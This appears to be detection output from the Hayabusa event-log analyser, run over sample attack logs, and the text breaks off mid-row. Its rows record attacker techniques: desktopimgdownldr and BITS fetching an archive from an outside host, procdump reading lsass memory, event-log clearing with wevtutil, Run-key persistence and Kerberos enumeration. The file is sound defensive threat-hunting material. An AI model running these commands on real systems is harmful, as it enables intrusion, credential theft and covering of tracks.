C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89ccc | PID: 1932 | PGUID: 747F3D96-F098-5EFE-0000-001012E13801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 08:47:20.037 +00:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 08:47:20.073 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: desktopimgdownldr.exe 
/lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\desktopimgdownldr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | LID: 0x89ccc | PID: 4604 | PGUID: 747F3D96-F098-5EFE-0000-001090E33801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 08:47:20.073 +00:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 08:47:21.491 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Personalization\LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z | Process: C:\Windows\System32\svchost.exe | PID: 1556 | PGUID: 747F3D96-2178-5EFE-0000-0010AADA5800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 08:47:21.491 +00:00,MSEDGEWIN10,11,high,Evas,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/file_event_win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 08:55:49.123 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Download LockScreen Image | URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx +2020-07-03 09:05:58.278 +00:00,win10.ecorp.com,1,info,,Process Created,"Cmd: explorer.exe /root,""c:\windows\System32\calc.exe"" | Process: 
C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf3072 | PID: 6860 | PGUID: 6661D424-F4F6-5EFE-0000-0010E7EFF800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 09:05:58.278 +00:00,win10.ecorp.com,1,low,Evas,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 09:05:58.278 +00:00,win10.ecorp.com,1,medium,Evas,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 09:05:58.367 +00:00,win10.ecorp.com,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0xf3072 | PID: 3612 | PGUID: 6661D424-F4F6-5EFE-0000-0010A2F6F800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 09:05:58.583 +00:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0xf3072 | PID: 3224 | PGUID: 6661D424-F4F6-5EFE-0000-0010C00AF900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 09:05:58.739 +00:00,win10.ecorp.com,1,info,,Process 
Created,"Cmd: ""C:\Windows\System32\win32calc.exe"" | Process: C:\Windows\System32\win32calc.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\System32\calc.exe"" | LID: 0xf3072 | PID: 2632 | PGUID: 6661D424-F4F6-5EFE-0000-00101D25F900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-04 14:18:58.268 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Hidden Run value detected | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\: ""c:\windows\tasks\taskhost.exe"" | Process: C:\Users\Public\tools\evasion\a.exe | PID: 3728 | PGUID: 747F3D96-8FD2-5F00-0000-0010C15D2200",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-04 14:18:58.268 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-04 14:31:26.838 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Count: DWORD (0x00000001) | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx +2020-07-04 14:31:26.849 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Section1: DefaultInstall | Process: 
C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx +2020-07-04 14:31:26.856 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Path1: c:\programdata\gpo.inf | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx +2020-07-07 21:51:39.204 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 30256 | Src PGUID: 00247C92-EE6B-5F04-0000-00108C67A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.204 +00:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.204 +00:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.256 
+00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.256 +00:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.256 +00:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.262 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 30096 | Tgt PGUID: 00247C92-EE6B-5F04-0000-00105C6CA859,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.262 +00:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-07 21:51:39.262 +00:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-09 19:07:25.659 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.706 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.737 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.784 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.831 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using 
Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.862 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.909 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.940 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:25.971 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:26.002 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 
19:07:26.034 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:26.065 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:26.112 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 19:07:26.143 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Eventlog Clear or Configuration Using Wevtutil,,rules/sigma/process_creation_builtin/proc_creation_win_susp_eventlog_clear.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (native).evtx +2020-07-09 20:08:00.463 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Auditpol Usage,,rules/sigma/process_creation_builtin/proc_creation_win_sus_auditpol_usage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4688-Audit policy deactivation attempt.evtx +2020-07-09 20:09:33.789 +00:00,fs02.offsec.lan,4688,high,Evas,Suspicious Auditpol Usage,,rules/sigma/process_creation_builtin/proc_creation_win_sus_auditpol_usage.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4688-Audit policy clear 
attempt.evtx +2020-07-09 20:41:04.488 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATACORE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.490 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PKI01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.496 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: EXCHANGE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.497 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.501 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS 
host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.505 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WSUS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.534 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: DHCP01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.576 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATANIDS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.861 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PRTG-MON$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.862 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account 
discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.863 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.864 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ADFS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.865 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEBIIS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.885 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.887 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS03VULN$ | IP Addr: ::ffff:10.23.23.9 | Status: 
0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.887 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.912 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.939 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.949 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.950 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: 
::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:04.951 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:05.016 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:58.983 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-09 20:41:59.810 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 